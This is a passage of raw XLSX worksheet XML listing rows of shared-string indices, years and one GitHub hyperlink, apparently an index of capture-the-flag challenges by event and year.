        <v>1863</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>676</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>342</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6">
      <c r="A6" s="18" t="s">
        <v>61</v>
      </c>
      <c r="B6" s="136">
        <v>2014.0</v>
      </c>
      <c r="C6" s="18" t="s">
        <v>1868</v>
      </c>
      <c r="D6" s="18" t="s">
        <v>23</v>
      </c>
      <c r="E6" s="18" t="s">
        <v>407</v>
      </c>
      <c r="F6" s="18" t="s">
        <v>342</v>
      </c>
      <c r="G6" s="137"/>
    </row>
    <row r="7">
      <c r="A7" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B7" s="11">
        <v>2014.0</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>1873</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>1874</v>
      </c>
      <c r="G7" s="138" t="s">
        <v>1875</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="3"/>
      <c r="B8" s="3"/>
      <c r="C8" s="3"/>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
      <c r="F8" s="3"/>
      <c r="G8" s="139" t="s">
        <v>1878</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B9" s="11">
        <v>2016.0</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>1883</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>785</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="G9" s="139" t="s">
        <v>1886</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B10" s="11">
        <v>2014.0</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>1891</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>407</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>1892</v>
      </c>
      <c r="G10" s="139" t="s">
        <v>1893</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="18" t="s">
        <v>61</v>
      </c>
      <c r="B11" s="136">
        <v>2014.0</v>
      </c>
      <c r="C11" s="18" t="s">
        <v>1898</v>
      </c>
      <c r="D11" s="18" t="s">
        <v>23</v>
      </c>
      <c r="E11" s="18" t="s">
        <v>407</v>
      </c>
      <c r="F11" s="18" t="s">
        <v>342</v>
      </c>
      <c r="G11" s="137"/>
    </row>
    <row r="12">
      <c r="A12" s="18" t="s">
        <v>61</v>
      </c>
      <c r="B12" s="136">
        <v>2014.0</v>
      </c>
      <c r="C12" s="18" t="s">
        <v>1900</v>
      </c>
      <c r="D12" s="18" t="s">
        <v>23</v>
      </c>
      <c r="E12" s="18" t="s">
        <v>407</v>
      </c>
      <c r="F12" s="18" t="s">
        <v>342</v>
      </c>
      <c r="G12" s="137"/>
    </row>
    <row r="13">
      <c r="A13" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B13" s="11">
        <v>2014.0</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>785</v>
      </c>
      <c r="F13" s="3"/>
      <c r="G13" s="3"/>
    </row>
    <row r="14">
      <c r="A14" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B14" s="11">
        <v>2014.0</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>1905</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>407</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>1907</v>
      </c>
      <c r="G14" s="3"/>
    </row>
    <row r="15">
      <c r="A15" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B15" s="11">
        <v>2014.0</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>407</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>1911</v>
      </c>
      <c r="G15" s="139" t="s">
        <v>1912</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B16" s="11">
        <v>2014.0</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>1914</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>300</v>
      </c>
      <c r="F16" s="3"/>
      <c r="G16" s="138" t="s">
        <v>1916</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B17" s="11">
        <v>2014.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>1920</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>407</v>
      </c>
      <c r="F17" s="13" t="s">
        <v>1921</v>
      </c>
      <c r="G17" s="138" t="s">
        <v>1922</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="17">
        <v>42503.0</v>
      </c>
      <c r="B18" s="7"/>
      <c r="C18" s="6"/>
      <c r="D18" s="6"/>
      <c r="E18" s="6"/>
      <c r="F18" s="6"/>
      <c r="G18" s="6"/>
      <c r="H18" s="6"/>
      <c r="I18" s="8"/>
      <c r="J18" s="8"/>
      <c r="K18" s="9"/>
      <c r="L18" s="9"/>
      <c r="M18" s="9"/>
      <c r="N18" s="9"/>
      <c r="O18" s="9"/>
      <c r="P18" s="9"/>
      <c r="Q18" s="9"/>
      <c r="R18" s="9"/>
      <c r="S18" s="9"/>
      <c r="T18" s="9"/>
      <c r="U18" s="9"/>
      <c r="V18" s="9"/>
      <c r="W18" s="9"/>
      <c r="X18" s="9"/>
      <c r="Y18" s="9"/>
      <c r="Z18" s="9"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="B19" s="11">
        <v>2014.0</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>1928</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>676</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>1931</v>
      </c>
      <c r="G19" s="2" t="s">
        <v>1933</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B20" s="20">
        <v>2014.0</v>
      </c>
      <c r="C20" s="19" t="s">
        <v>1935</v>
      </c>
      <c r="D20" s="19" t="s">
        <v>48</v>
      </c>
      <c r="E20" s="19" t="s">
        <v>676</v>
      </c>
      <c r="F20" s="19" t="s">
        <v>1937</v>
      </c>
      <c r="G20" s="3"/>
    </row>
    <row r="21">
      <c r="A21" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B21" s="20">
        <v>2014.0</v>
      </c>
      <c r="C21" s="19" t="s">
        <v>1939</v>
      </c>
      <c r="D21" s="19" t="s">
        <v>48</v>
      </c>
      <c r="E21" s="19" t="s">
        <v>676</v>
      </c>
      <c r="F21" s="19" t="s">
        <v>1940</v>
      </c>
      <c r="G21" s="3"/>
    </row>
    <row r="22">
      <c r="A22" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B22" s="20">
        <v>2014.0</v>
      </c>
      <c r="C22" s="19" t="s">
        <v>1941</v>
      </c>
      <c r="D22" s="19" t="s">
        <v>48</v>
      </c>
      <c r="E22" s="19" t="s">
        <v>1873</v>
      </c>
      <c r="F22" s="19" t="s">
        <v>1080</v>
      </c>
      <c r="G22" s="3"/>
    </row>
    <row r="23">
      <c r="A23" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B23" s="20">
        <v>2014.0</v>
      </c>
      <c r="C23" s="19" t="s">
        <v>1943</v>
      </c>
      <c r="D23" s="19" t="s">
        <v>48</v>
      </c>
      <c r="E23" s="19" t="s">
        <v>676</v>
      </c>
      <c r="F23" s="19" t="s">
        <v>1944</v>
      </c>
      <c r="G23" s="3"/>
    </row>
    <row r="24">
      <c r="A24" s="17">
        <v>42507.0</v>
      </c>
      <c r="B24" s="7"/>
      <c r="C24" s="6"/>
      <c r="D24" s="6"/>
      <c r="E24" s="6"/>
      <c r="F24" s="6"/>
      <c r="G24" s="6"/>
      <c r="H24" s="6"/>
      <c r="I24" s="8"/>
      <c r="J24" s="8"/>
      <c r="K24" s="9"/>
      <c r="L24" s="9"/>
      <c r="M24" s="9"/>
      <c r="N24" s="9"/>
      <c r="O24" s="9"/>
      <c r="P24" s="9"/>
      <c r="Q24" s="9"/>
      <c r="R24" s="9"/>
      <c r="S24" s="9"/>
      <c r="T24" s="9"/>
      <c r="U24" s="9"/>
      <c r="V24" s="9"/>
      <c r="W24" s="9"/>
      <c r="X24" s="9"/>
      <c r="Y24" s="9"/>
      <c r="Z24" s="9"/>
    </row>
    <row r="25">
      <c r="A25" s="113" t="s">
        <v>273</v>
      </c>
      <c r="B25" s="115">
        <v>2014.0</v>
      </c>
      <c r="C25" s="113" t="s">
        <v>1949</v>
      </c>
      <c r="D25" s="113" t="s">
        <v>128</v>
      </c>
      <c r="E25" s="111" t="s">
        <v>676</v>
      </c>
      <c r="F25" s="113" t="s">
        <v>1951</v>
      </c>
      <c r="G25" s="113" t="s">
        <v>1952</v>
      </c>
      <c r="H25" s="30"/>
    </row>
    <row r="26">
      <c r="A26" s="30" t="s">
        <v>273</v>
      </c>
      <c r="B26" s="31">
        <v>2014.0</v>
      </c>
      <c r="C26" s="30" t="s">
        <v>1953</v>
      </c>
      <c r="D26" s="30" t="s">
        <v>573</v>
      </c>
      <c r="E26" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F26" s="30" t="s">
        <v>1954</v>
      </c>
      <c r="G26" s="30"/>
      <c r="H26" s="30"/>
    </row>
    <row r="27">
      <c r="A27" s="23" t="s">
        <v>236</v>
      </c>
      <c r="B27" s="24">
        <v>2014.0</v>
      </c>
      <c r="C27" s="23" t="s">
        <v>1955</v>
      </c>
      <c r="D27" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E27" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F27" s="23" t="s">
        <v>267</v>
      </c>
      <c r="G27" s="23" t="s">
        <v>1956</v>
      </c>
      <c r="I27" s="29"/>
      <c r="J27" s="29"/>
      <c r="K27" s="29"/>
      <c r="L27" s="29"/>
      <c r="M27" s="29"/>
      <c r="N27" s="29"/>
      <c r="O27" s="29"/>
      <c r="P27" s="29"/>
      <c r="Q27" s="29"/>
      <c r="R27" s="29"/>
      <c r="S27" s="29"/>
      <c r="T27" s="29"/>
      <c r="U27" s="29"/>
      <c r="V27" s="29"/>
      <c r="W27" s="29"/>
      <c r="X27" s="29"/>
      <c r="Y27" s="29"/>
      <c r="Z27" s="29"/>
    </row>
    <row r="28">
      <c r="A28" s="23" t="s">
        <v>236</v>
      </c>
      <c r="B28" s="24">
        <v>2014.0</v>
      </c>
      <c r="C28" s="23" t="s">
        <v>1957</v>
      </c>
      <c r="D28" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E28" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F28" s="23" t="s">
        <v>1958</v>
      </c>
      <c r="G28" s="23" t="s">
        <v>1960</v>
      </c>
      <c r="I28" s="29"/>
      <c r="J28" s="29"/>
      <c r="K28" s="29"/>
      <c r="L28" s="29"/>
      <c r="M28" s="29"/>
      <c r="N28" s="29"/>
      <c r="O28" s="29"/>
      <c r="P28" s="29"/>
      <c r="Q28" s="29"/>
      <c r="R28" s="29"/>
      <c r="S28" s="29"/>
      <c r="T28" s="29"/>
      <c r="U28" s="29"/>
      <c r="V28" s="29"/>
      <c r="W28" s="29"/>
      <c r="X28" s="29"/>
      <c r="Y28" s="29"/>
      <c r="Z28" s="29"/>
    </row>
    <row r="29">
      <c r="A29" s="23" t="s">
        <v>236</v>
      </c>
      <c r="B29" s="24">
        <v>2014.0</v>
      </c>
      <c r="C29" s="23" t="s">
        <v>1961</v>
      </c>
      <c r="D29" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E29" s="23" t="s">
        <v>676</v>
      </c>
      <c r="F29" s="23" t="s">
        <v>1962</v>
      </c>
      <c r="G29" s="23" t="s">
        <v>1964</v>
      </c>
      <c r="I29" s="29"/>
      <c r="J29" s="29"/>
      <c r="K29" s="29"/>
      <c r="L29" s="29"/>
      <c r="M29" s="29"/>
      <c r="N29" s="29"/>
      <c r="O29" s="29"/>
      <c r="P29" s="29"/>
      <c r="Q29" s="29"/>
      <c r="R29" s="29"/>
      <c r="S29" s="29"/>
      <c r="T29" s="29"/>
      <c r="U29" s="29"/>
      <c r="V29" s="29"/>
      <c r="W29" s="29"/>
      <c r="X29" s="29"/>
      <c r="Y29" s="29"/>
      <c r="Z29" s="29"/>
    </row>
    <row r="30">
      <c r="A30" s="23" t="s">
        <v>236</v>
      </c>
      <c r="B30" s="24">
        <v>2014.0</v>
      </c>
      <c r="C30" s="23" t="s">
        <v>1970</v>
      </c>
      <c r="D30" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E30" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F30" s="23" t="s">
        <v>1972</v>
      </c>
      <c r="G30" s="23" t="s">
        <v>1973</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="23" t="s">
        <v>236</v>
      </c>
      <c r="B31" s="24">
        <v>2014.0</v>
      </c>
      <c r="C31" s="23" t="s">
        <v>1980</v>
      </c>
      <c r="D31" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E31" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F31" s="23" t="s">
        <v>1982</v>
      </c>
      <c r="G31" s="23" t="s">
        <v>1983</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B32" s="39">
        <v>2014.0</v>
      </c>
      <c r="C32" s="37" t="s">
        <v>1985</v>
      </c>
      <c r="D32" s="37" t="s">
        <v>128</v>
      </c>
      <c r="E32" s="37" t="s">
        <v>676</v>
      </c>
      <c r="F32" s="141" t="s">
        <v>682</v>
      </c>
      <c r="G32" s="141" t="s">
        <v>342</v>
      </c>
      <c r="H32" s="37"/>
    </row>
    <row r="33">
      <c r="A33" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B33" s="39">
        <v>2014.0</v>
      </c>
      <c r="C33" s="37" t="s">
        <v>1997</v>
      </c>
      <c r="D33" s="37" t="s">
        <v>128</v>
      </c>
      <c r="E33" s="37" t="s">
        <v>676</v>
      </c>
      <c r="F33" s="141" t="s">
        <v>682</v>
      </c>
      <c r="G33" s="141" t="s">
        <v>342</v>
      </c>
      <c r="H33" s="37"/>
    </row>
    <row r="34">
      <c r="A34" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B34" s="39">
        <v>2014.0</v>
      </c>
      <c r="C34" s="37" t="s">
        <v>2001</v>
      </c>
      <c r="D34" s="37" t="s">
        <v>48</v>
      </c>
      <c r="E34" s="37" t="s">
        <v>407</v>
      </c>
      <c r="F34" s="141" t="s">
        <v>2002</v>
      </c>
      <c r="G34" s="141" t="s">
        <v>342</v>
      </c>
      <c r="H34" s="37"/>
    </row>
    <row r="35">
      <c r="A35" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B35" s="39">
        <v>2014.0</v>
      </c>
      <c r="C35" s="37" t="s">
        <v>2005</v>
      </c>
      <c r="D35" s="37" t="s">
        <v>48</v>
      </c>
      <c r="E35" s="37" t="s">
        <v>2006</v>
      </c>
      <c r="F35" s="141" t="s">
        <v>2007</v>
      </c>
      <c r="G35" s="45" t="s">
        <v>342</v>
      </c>
      <c r="H35" s="37"/>
    </row>
    <row r="36">
      <c r="A36" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B36" s="39">
        <v>2014.0</v>
      </c>
      <c r="C36" s="37" t="s">
        <v>2009</v>
      </c>
      <c r="D36" s="37" t="s">
        <v>48</v>
      </c>
      <c r="E36" s="37" t="s">
        <v>676</v>
      </c>
      <c r="F36" s="141" t="s">
        <v>2011</v>
      </c>
      <c r="G36" s="142" t="s">
        <v>2018</v>
      </c>
      <c r="H36" s="37"/>
    </row>
    <row r="37">
      <c r="A37" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B37" s="39">
        <v>2014.0</v>
      </c>
      <c r="C37" s="37" t="s">
        <v>2027</v>
      </c>
      <c r="D37" s="37" t="s">
        <v>128</v>
      </c>
      <c r="E37" s="37" t="s">
        <v>2029</v>
      </c>
      <c r="F37" s="141" t="s">
        <v>2030</v>
      </c>
      <c r="G37" s="141" t="s">
        <v>342</v>
      </c>
      <c r="H37" s="37"/>
    </row>
    <row r="38">
      <c r="A38" s="23" t="s">
        <v>264</v>
      </c>
      <c r="B38" s="24">
        <v>2014.0</v>
      </c>
      <c r="C38" s="23" t="s">
        <v>2032</v>
      </c>
      <c r="D38" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E38" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F38" s="23" t="s">
        <v>2034</v>
      </c>
      <c r="G38" s="23" t="s">
        <v>2036</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="23" t="s">
        <v>264</v>
      </c>
      <c r="B39" s="24">
        <v>2014.0</v>
      </c>
      <c r="C39" s="23" t="s">
        <v>2041</v>
      </c>
      <c r="D39" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E39" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F39" s="23" t="s">
        <v>2044</v>
      </c>
      <c r="G39" s="23" t="s">
        <v>2045</v>
      </c>
    </row>
    <row r="40" ht="4.5" customHeight="1">
      <c r="A40" s="23" t="s">
        <v>264</v>
      </c>
      <c r="B40" s="24">
        <v>2014.0</v>
      </c>
      <c r="C40" s="23" t="s">
        <v>2054</v>
      </c>
      <c r="D40" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E40" s="23"/>
      <c r="F40" s="23" t="s">
        <v>2056</v>
      </c>
      <c r="G40" s="23" t="s">
        <v>2057</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="17">
        <v>42517.0</v>
      </c>
      <c r="B41" s="7"/>
      <c r="C41" s="6"/>
      <c r="D41" s="6"/>
      <c r="E41" s="6"/>
      <c r="F41" s="6"/>
      <c r="G41" s="6"/>
      <c r="H41" s="6"/>
      <c r="I41" s="8"/>
      <c r="J41" s="8"/>
      <c r="K41" s="9"/>
      <c r="L41" s="9"/>
      <c r="M41" s="9"/>
      <c r="N41" s="9"/>
      <c r="O41" s="9"/>
      <c r="P41" s="9"/>
      <c r="Q41" s="9"/>
      <c r="R41" s="9"/>
      <c r="S41" s="9"/>
      <c r="T41" s="9"/>
      <c r="U41" s="9"/>
      <c r="V41" s="9"/>
      <c r="W41" s="9"/>
      <c r="X41" s="9"/>
      <c r="Y41" s="9"/>
      <c r="Z41" s="9"/>
    </row>
    <row r="42">
      <c r="A42" s="30" t="s">
        <v>273</v>
      </c>
      <c r="B42" s="31">
        <v>2014.0</v>
      </c>
      <c r="C42" s="30" t="s">
        <v>2064</v>
      </c>
      <c r="D42" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E42" s="35" t="s">
        <v>2070</v>
      </c>
      <c r="F42" s="30" t="s">
        <v>2072</v>
      </c>
      <c r="G42" s="30" t="s">
        <v>2073</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="30" t="s">
        <v>273</v>
      </c>
      <c r="B43" s="31">
        <v>2014.0</v>
      </c>
      <c r="C43" s="30" t="s">
        <v>2075</v>
      </c>
      <c r="D43" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E43" s="32" t="s">
        <v>997</v>
      </c>
      <c r="F43" s="30" t="s">
        <v>2077</v>
      </c>
      <c r="G43" s="30" t="s">
        <v>2078</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="34" t="s">
        <v>273</v>
      </c>
      <c r="B44" s="134">
        <v>2014.0</v>
      </c>
      <c r="C44" s="34" t="s">
        <v>2079</v>
      </c>
      <c r="D44" s="34" t="s">
        <v>128</v>
      </c>
      <c r="E44" s="32" t="s">
        <v>2080</v>
      </c>
      <c r="F44" s="34" t="s">
        <v>2081</v>
      </c>
      <c r="G44" s="143" t="str">
        <f>HYPERLINK("https://github.com/elfmaster/sherlocked","sherlocked ")</f>
        <v>sherlocked </v>
      </c>
      <c r="H44" s="105"/>
      <c r="I44" s="105"/>
      <c r="J44" s="105"/>
      <c r="K44" s="105"/>
      <c r="L44" s="105"/>
      <c r="M44" s="105"/>
      <c r="N44" s="105"/>
      <c r="O44" s="105"/>
      <c r="P44" s="105"/>
      <c r="Q44" s="105"/>
      <c r="R44" s="105"/>
      <c r="S44" s="105"/>
      <c r="T44" s="105"/>
      <c r="U44" s="105"/>
      <c r="V44" s="105"/>
      <c r="W44" s="105"/>
      <c r="X44" s="105"/>
      <c r="Y44" s="105"/>
      <c r="Z44" s="105"/>
    </row>
    <row r="45">
      <c r="A45" s="145">
        <v>9447.0</v>
      </c>
      <c r="B45" s="134">
        <v>2014.0</v>
      </c>
      <c r="C45" s="34" t="s">
        <v>2114</v>
      </c>
      <c r="D45" s="34" t="s">
        <v>128</v>
      </c>
      <c r="E45" s="32" t="s">
        <v>2115</v>
      </c>
      <c r="F45" s="32" t="s">
        <v>2116</v>
      </c>
      <c r="G45" s="34" t="s">
        <v>2117</v>
      </c>
      <c r="H45" s="34" t="s">
        <v>2119</v>
      </c>
      <c r="I45" s="105"/>
      <c r="J45" s="105"/>
      <c r="K45" s="105"/>
      <c r="L45" s="105"/>
      <c r="M45" s="105"/>
      <c r="N45" s="105"/>
      <c r="O45" s="105"/>
      <c r="P45" s="105"/>
      <c r="Q45" s="105"/>
      <c r="R45" s="105"/>
      <c r="S45" s="105"/>
      <c r="T45" s="105"/>
      <c r="U45" s="105"/>
      <c r="V45" s="105"/>
      <c r="W45" s="105"/>
      <c r="X45" s="105"/>
      <c r="Y45" s="105"/>
      <c r="Z45" s="105"/>
    </row>
    <row r="46">
      <c r="A46" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B46" s="43">
        <v>2014.0</v>
      </c>
      <c r="C46" s="5" t="s">
        <v>491</v>
      </c>
      <c r="D46" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E46" s="3"/>
      <c r="F46" s="5" t="s">
        <v>2122</v>
      </c>
      <c r="G46" s="3"/>
    </row>
    <row r="47">
      <c r="A47" s="5" t="s">
        <v>362</v>
      </c>
      <c r="B47" s="43">
        <v>2014.0</v>
      </c>
      <c r="C47" s="5" t="s">
        <v>2124</v>
      </c>
      <c r="D47" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E47" s="3"/>
      <c r="F47" s="5" t="s">
        <v>2125</v>
      </c>
      <c r="G47" s="5" t="s">
        <v>2127</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="s">
        <v>362</v>
      </c>
      <c r="B48" s="43">
        <v>2014.0</v>
      </c>
      <c r="C48" s="5" t="s">
        <v>2129</v>
      </c>
      <c r="D48" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E48" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F48" s="5" t="s">
        <v>2130</v>
      </c>
      <c r="G48" s="3"/>
    </row>
    <row r="49">
      <c r="A49" s="37" t="s">
        <v>348</v>
      </c>
      <c r="B49" s="39">
        <v>2014.0</v>
      </c>
      <c r="C49" s="37" t="s">
        <v>2132</v>
      </c>
      <c r="D49" s="37" t="s">
        <v>128</v>
      </c>
      <c r="E49" s="37" t="s">
        <v>407</v>
      </c>
      <c r="F49" s="37" t="s">
        <v>2133</v>
      </c>
      <c r="G49" s="37" t="s">
        <v>342</v>
      </c>
      <c r="H49" s="68"/>
    </row>
    <row r="50">
      <c r="A50" s="23" t="s">
        <v>362</v>
      </c>
      <c r="B50" s="24">
        <v>2014.0</v>
      </c>
      <c r="C50" s="23" t="s">
        <v>2135</v>
      </c>
      <c r="D50" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E50" s="23"/>
      <c r="F50" s="23" t="s">
        <v>2137</v>
      </c>
      <c r="L50" s="28"/>
    </row>
    <row r="51">
      <c r="A51" s="146" t="s">
        <v>362</v>
      </c>
      <c r="B51" s="147">
        <v>2014.0</v>
      </c>
      <c r="C51" s="146" t="s">
        <v>2142</v>
      </c>
      <c r="D51" s="146" t="s">
        <v>48</v>
      </c>
      <c r="E51" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F51" s="146" t="s">
        <v>2144</v>
      </c>
      <c r="K51" s="148"/>
      <c r="L51" s="149"/>
      <c r="M51" s="105"/>
      <c r="N51" s="105"/>
      <c r="O51" s="105"/>
      <c r="P51" s="105"/>
      <c r="Q51" s="105"/>
      <c r="R51" s="105"/>
      <c r="S51" s="105"/>
      <c r="T51" s="105"/>
      <c r="U51" s="105"/>
      <c r="V51" s="105"/>
      <c r="W51" s="105"/>
      <c r="X51" s="105"/>
      <c r="Y51" s="105"/>
      <c r="Z51" s="105"/>
    </row>
    <row r="52">
      <c r="A52" s="146" t="s">
        <v>362</v>
      </c>
      <c r="B52" s="147">
        <v>2014.0</v>
      </c>
      <c r="C52" s="146" t="s">
        <v>2146</v>
      </c>
      <c r="F52" s="146" t="s">
        <v>48</v>
      </c>
      <c r="G52" s="146" t="s">
        <v>2147</v>
      </c>
      <c r="L52" s="23"/>
    </row>
    <row r="53">
      <c r="A53" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B53" s="43">
        <v>2014.0</v>
      </c>
      <c r="C53" s="5" t="s">
        <v>2148</v>
      </c>
      <c r="D53" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E53" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F53" s="5" t="s">
        <v>679</v>
      </c>
      <c r="G53" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B54" s="43">
        <v>2014.0</v>
      </c>
      <c r="C54" s="5" t="s">
        <v>2149</v>
      </c>
      <c r="D54" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E54" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F54" s="5" t="s">
        <v>130</v>
      </c>
      <c r="G54" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B55" s="43">
        <v>2014.0</v>
      </c>
      <c r="C55" s="5" t="s">
        <v>2150</v>
      </c>
      <c r="D55" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E55" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F55" s="5" t="s">
        <v>2151</v>
      </c>
      <c r="G55" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B56" s="43">
        <v>2014.0</v>
      </c>
      <c r="C56" s="5" t="s">
        <v>2152</v>
      </c>
      <c r="D56" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E56" s="5" t="s">
        <v>785</v>
      </c>
      <c r="F56" s="5" t="s">
        <v>2153</v>
      </c>
      <c r="G56" s="5" t="s">
        <v>2154</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="61" t="s">
        <v>1718</v>
      </c>
      <c r="B57" s="36"/>
      <c r="C57" s="36"/>
      <c r="D57" s="36"/>
      <c r="E57" s="36"/>
      <c r="F57" s="45"/>
      <c r="G57" s="36"/>
      <c r="H57" s="68"/>
      <c r="I57" s="68"/>
      <c r="J57" s="68"/>
    </row>
    <row r="58">
      <c r="A58" s="36">
        <v>9447.0</v>
      </c>
      <c r="B58" s="36">
        <v>2014.0</v>
      </c>
      <c r="C58" s="36" t="s">
        <v>2155</v>
      </c>
      <c r="D58" s="36" t="s">
        <v>1363</v>
      </c>
      <c r="E58" s="36" t="s">
        <v>2156</v>
      </c>
      <c r="F58" s="45" t="s">
        <v>2157</v>
      </c>
      <c r="G58" s="36" t="s">
        <v>2158</v>
      </c>
      <c r="H58" s="68"/>
      <c r="I58" s="68"/>
      <c r="J58" s="68"/>
    </row>
    <row r="59">
      <c r="A59" s="36">
        <v>9447.0</v>
      </c>
      <c r="B59" s="36">
        <v>2014.0</v>
      </c>
      <c r="C59" s="36" t="s">
        <v>2159</v>
      </c>
      <c r="D59" s="36" t="s">
        <v>23</v>
      </c>
      <c r="E59" s="36" t="s">
        <v>2160</v>
      </c>
      <c r="F59" s="45" t="s">
        <v>2161</v>
      </c>
      <c r="G59" s="36" t="s">
        <v>2162</v>
      </c>
      <c r="H59" s="68"/>
      <c r="I59" s="68"/>
      <c r="J59" s="68"/>
    </row>
    <row r="60">
      <c r="A60" s="36">
        <v>9447.0</v>
      </c>
      <c r="B60" s="36">
        <v>2014.0</v>
      </c>
      <c r="C60" s="36" t="s">
        <v>2163</v>
      </c>
      <c r="D60" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E60" s="36" t="s">
        <v>2160</v>
      </c>
      <c r="F60" s="45" t="s">
        <v>2164</v>
      </c>
      <c r="G60" s="36" t="s">
        <v>2165</v>
      </c>
      <c r="H60" s="68"/>
      <c r="I60" s="68"/>
      <c r="J60" s="68"/>
    </row>
    <row r="61">
      <c r="A61" s="36">
        <v>9447.0</v>
      </c>
      <c r="B61" s="36">
        <v>2014.0</v>
      </c>
      <c r="C61" s="36" t="s">
        <v>2166</v>
      </c>
      <c r="D61" s="36" t="s">
